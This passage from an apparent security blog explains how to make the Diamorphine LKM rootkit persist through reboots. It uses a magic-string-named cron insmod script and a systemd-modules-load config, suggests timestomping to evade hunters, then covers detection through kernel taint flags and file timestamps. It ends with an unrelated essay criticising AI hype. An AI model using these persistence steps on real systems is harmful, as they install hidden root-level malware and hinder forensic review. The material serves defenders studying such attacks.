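    /mnt/alt/lib/modules
# depmod -b /mnt/alt $(uname -r)
# diff <(strings -a /usr/lib/modules/$(uname -r)/modules.dep.bin) \
    <(strings -a /mnt/alt/lib/modules/$(uname -r)/modules.dep.bin)

The files under /usr/lib/modules are never modified; everything depmod writes is diverted into /mnt/upper.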

But honestly, using modprobe to load your LKM rootkit is probably not the best approach. insmod allows you to specify the full path to your evil module. Create a script that uses insmod to load the rootkit, and then drop the script into /etc/cron.hourly with a file name that will be hidden once the rootkit is loaded. Easy!
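
A minimal sketch of such a loader script, assuming the same Diamorphine build as before (the module path and file name are illustrative):

#!/bin/sh
# /etc/cron.hourly/zaq123edcx-loader
# The magic-string prefix means the rootkit hides this script once loaded.
# Note no dots in the file name: run-parts on Debian-type systems skips those.
# insmod takes a full path, so the module can live anywhere on disk.
# Errors (e.g. module already resident) are silently discarded.
insmod /usr/local/lib/zaq123edcx-diamorphine.ko 2>/dev/null
exit 0

Don’t forget to make the script executable, or cron will never run it.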

Linux LKM Persistence

Back in August, Ruben Groenewoud posted two detailed articles on Linux persistence mechanisms and then followed that up with a testing/simulation tool called PANIX that implements many of these persistence mechanisms. Ruben’s work was, in turn, influenced by a series of articles by Pepe Berba and work by Eder Ignacio. Eder’s February article on persistence with udev rules seems particularly prescient after Stroz/AON reported in August on a long-running campaign using udev rules for persistence. I highly recommend all of this work, and frankly I’m including these links so I personally have an easy place to go find them whenever I need them.

In general, all of this work focuses on using persistence mechanisms for running programs in user space. For example, PANIX sets up a simple reverse shell by default (though the actual payload can be customized) and the “sedexp” campaign described by Stroz/AON used udev rules to trigger a custom malware executable.

Reading all of this material got my evil mind working, and got me thinking about how I might handle persistence if I was working with a Linux loadable kernel module (LKM) type rootkit. Certainly I could use any of the user space persistence mechanisms in PANIX that run with root privilege (or at least have CAP_SYS_MODULE capability) to call modprobe or insmod to load my evil kernel module. But what about other Linux mechanisms for specifically loading kernel modules at boot time?

Hiks Gerganov has written a useful article summarizing how to load Linux modules at boot time. If you want to be traditional, you can always put the name of the module you want to load into /etc/modules. But that seems a little too obvious, so instead we are going to use the more flexible systemd-modules-load service to get our evil kernel module installed.

systemd-modules-load looks in multiple directories for configuration files specifying modules to load, including /etc/modules-load.d, /usr/lib/modules-load.d, and /usr/local/lib/modules-load.d. systemd-modules-load also looks in /run/modules-load.d, but /run is typically a tmpfs style file system that does not persist across reboots. Configuration file names must end with “.conf” and simply contain the names of the modules to load, one name per line.

For my examples, I’m going to use the Diamorphine LKM rootkit. Diamorphine started out as a proof-of-concept rootkit, but a Diamorphine variant has recently been found in the wild. Diamorphine allows you to choose a “magic string” at compile time– any file or directory name that starts with the magic string will automatically be hidden by the rootkit once the rootkit is loaded into the kernel. In my examples I am using the magic string “zaq123edcx”.

First we need to copy the Diamorphine kernel module, typically compiled as diamorphine.ko, into a directory under /usr/lib/modules where it can be found by the modprobe command invoked by systemd-modules-load:

# cp diamorphine.ko /usr/lib/modules/$(uname -r)/kernel/drivers/block/zaq123edcx-diamorphine.ko
# depmod

Note that the directory under /usr/lib/modules is kernel version specific. You can put your evil module anywhere under /usr/lib/modules/*/kernel that you like. Notice that by using the magic string in the file name, we are relying on the rootkit itself to hide the module. Of course, if the victim machine receives a kernel update then your Diamorphine module in the older kernel directory will no longer be loaded and your evil plots could end up being exposed.

The depmod step is necessary to update the /usr/lib/modules/*/modules.dep and /usr/lib/modules/*/modules.dep.bin files. Until these files are updated, modprobe will be unable to locate your kernel module. Unfortunately, depmod puts the path name of your evil module into both of the modules.dep* files. So you will probably want to choose a less obvious name (and magic string) than the one I am using here.
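
After running depmod, you can check that modprobe is able to resolve the module name with a dry run (“-n”); the path in the output will reflect your kernel version:

# modprobe -n -v zaq123edcx-diamorphine
insmod /usr/lib/modules/.../kernel/drivers/block/zaq123edcx-diamorphine.ko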

The only other step needed is to create a configuration file for systemd-modules-load:

# echo zaq123edcx-diamorphine >/usr/lib/modules-load.d/zaq123edcx-evil.conf

The configuration file is just a single line– whatever name you copied the evil module to under /usr/lib/modules, but without the “.ko” extension. Here again we name the configuration file with the Diamorphine magic string so the file will be hidden once the rootkit is loaded.

That’s all the configuration you need to do. Load the rootkit manually by running “modprobe zaq123edcx-diamorphine” and rest easy in the knowledge that the rootkit will load automatically whenever the system reboots.

Finding the Evil

What artifacts are created by these changes? The mtime on the /usr/lib/modules-load.d directory and the directory where you installed the rootkit module will be updated. Aside from putting the name of your evil module into the modules.dep* files, the depmod command updates the mtime on several other files under /usr/lib/modules/*:

/usr/lib/modules/.../modules.alias
/usr/lib/modules/.../modules.alias.bin
/usr/lib/modules/.../modules.builtin.alias.bin
/usr/lib/modules/.../modules.builtin.bin
/usr/lib/modules/.../modules.dep
/usr/lib/modules/.../modules.dep.bin
/usr/lib/modules/.../modules.devname
/usr/lib/modules/.../modules.softdep
/usr/lib/modules/.../modules.symbols
/usr/lib/modules/.../modules.symbols.bin

Timestomping these files and directories could make things more difficult for hunters.
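
One simple hunt is to compare the mtimes on the modules.dep* files against the time the kernel package was installed or last updated. On a dpkg-based system that might look something like the following (adjust the package name and logs for your distribution, and beware that DKMS and other legitimate tooling also run depmod):

$ ls -l --time-style=long-iso /usr/lib/modules/$(uname -r)/modules.dep*
$ zgrep 'linux-image' /var/log/dpkg.log* | grep ' installed '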

But loading the rootkit is also likely to “taint” the kernel. You can try looking at the dmesg output for taint warnings:

# dmesg | grep taint
[ 8.390098] diamorphine: loading out-of-tree module taints kernel.
[ 8.390112] diamorphine: module verification failed: signature and/or required key missing - tainting kernel

However, these log messages can be removed by the attacker, or simply disappear as the kernel ring buffer wraps or the persistent logs get rotated (if the machine has been running long enough). So you should also look at /proc/sys/kernel/tainted:

# cat /proc/sys/kernel/tainted
12288

Any non-zero value means that the kernel is tainted. The value is a bitmask– in our example, 12288 = 4096 + 8192, meaning bits 12 and 13 are set. To interpret the value, here is a trick based on an idea in the kernel.org tainted-kernels documentation:

# taintval=$(cat /proc/sys/kernel/tainted)
# for i in {0..18}; do [[ $(($taintval>>$i & 1)) -eq 1 ]] && echo $i; done
12
13

Referring to the kernel.org document, bit 12 being set means an “out of tree” (externally built) module was loaded. Bit 13 means the module was unsigned. Notice that these flags correspond to the log messages found in the dmesg output above.

While this is a useful bit of command-line kung fu, I thought it would be handy to have in a more portable format and with more verbose output. So I present to you chktaint.sh:

$ chktaint.sh
externally-built (“out-of-tree”) module was loaded
unsigned module was loaded

By default chktaint.sh reads the value from /proc/sys/kernel/tainted on the live system. But in many cases you may be looking at captured evidence offline. So chktaint.sh also allows you to specify an alternate file path (“chktaint.sh /path/to/evidence/file”) or simply a raw numeric value from /proc/sys/kernel/tainted (“chktaint.sh 12288”).

The persistence mechanism(s) deployed by the attacker are often the best way to detect whether or not a system is compromised. If the attacker is using an LKM rootkit, checking /proc/sys/kernel/tainted is often a good first step in determining if you have a problem. This can be combined with tools like chkproc (find hidden processes) and chkdirs (find hidden directories) from the chkrootkit project.

The Emperor’s New Clothes

My good friend Matt and I graduated college the same year. I went off into the work world and he headed for a graduate degree program in nuclear engineering. Much of the research effort in nuclear engineering is centered on developing sustainable fusion technology. Matt quickly realized that something was off.

So he went to his faculty advisor, who had been pursuing fusion research for several decades, and asked him, “I’m in my early 20s– do you think we will achieve viable fusion technology in my lifetime?”

The advisor’s answer was an involved discussion of “No.” Sustainable fusion technology involves an entire collection of problems that we are not close to solving. The materials science required just to build a vessel that can safely contain a fusion reaction and extract power from it remains beyond our capabilities, decades after my friend had this conversation with his advisor.

Happily for my friend, he had this conversation before he had sunk too much time into his research. Matt bailed out of nuclear engineering, changed his research focus, and has had a highly successful career in engineering education.

Meanwhile, I had been lucky enough to land a job doing Unix support at AT&T Bell Labs. One of the projects we supported was a research group that was working to develop a bespoke system that implemented Karmarkar’s algorithm for linear programming. This was an enormous project that employed hundreds of developers and consumed huge amounts of resources. The customers were the major airlines– scheduling aircraft and the flight crews that staff them is a classic problem in linear programming that directly impacts the bottom line of these companies.

You likely have never heard of Karmarkar’s algorithm, except perhaps for the controversy around it. Initially hailed as a major step forward that would revolutionize linear programming, its detractors claimed that, upon closer scrutiny, this so-called “revolutionary” algorithm was just a combination of known heuristics and speedups. It was not a substantial improvement over existing algorithms of the time.

I never studied the algorithm enough to determine which side’s claims were correct. What I do know is that the airlines pulled their funding and AT&T’s project was scuttled. The IT support team came in on Monday and everybody who was working on that project was literally gone. We moved through their empty office space for the next week collecting computer equipment to be repurposed for other projects. Some of the developers got shifted to other projects as well, but I imagine many people suddenly found themselves looking for work.

The airlines poured millions of dollars into a project that produced exactly nothing of value. Governments around the world continue to pour billions into fusion research with little to show for it and very little hope of fusion power in our lifetimes. Why is so much time, effort, and money being wasted?

These projects have several factors in common. Their goal is highly desirable: a “revolution” that would reshape the world as we know it, or at least an entire industry. The path involves highly complex technology that is impenetrable to a non-specialist: a complex algorithm or deep scientific research necessary to invent things that have never been done before. And they require massive amounts of funding.

This is a perfect recipe for bad decision making or outright fraud. People will sacrifice a great deal to achieve a significant goal. Because the path to that goal is difficult to comprehend, people will fool themselves into thinking the solution is “just around the corner”. Critical thinking skills fly out the window as people focus on the goal and can’t or won’t focus on the process to get there.

And when the project attracts unscrupulous operators who realize that there is money to be made in prolonging the effort, you have the makings of a bezzle. The unscrupulous promise a wonderful new world but use any excuse to keep extracting money from the situation. When challenged about their lack of results they just say, “Technology is complex and unpredictable, but I swear we are almost there!” Technology is a perfect breeding ground for bezzles because we have socialized the idea that computers and technology are inscrutable to mere mortals who must defer to a high priesthood to interpret the signs and omens.

“Generative AI” and “large language models” are the latest techno bezzle. But “AI” is a constant and recurring bezzle that I have seen numerous times in my decades in technology. Remember “machine learning”? Remember “neural networks”? I have lived through too many of these hype cycles and seen too many people lose their jobs and/or retirement funds due to companies that bet the farm on the latest bezzle.

The AI hype is too strong right now for me to convince people caught up in it that they are being conned. But for the rest of you I want you to recognize the patterns at play here and apply your critical thinking skills to any new “revolutionary” technologies that follow a similar path. And try to educate others so that we don’t as a society keep making the same sorts of mistakes over and over again. The resources we are wasting on the current AI hype cycle are killing the planet and could be put to so much better use.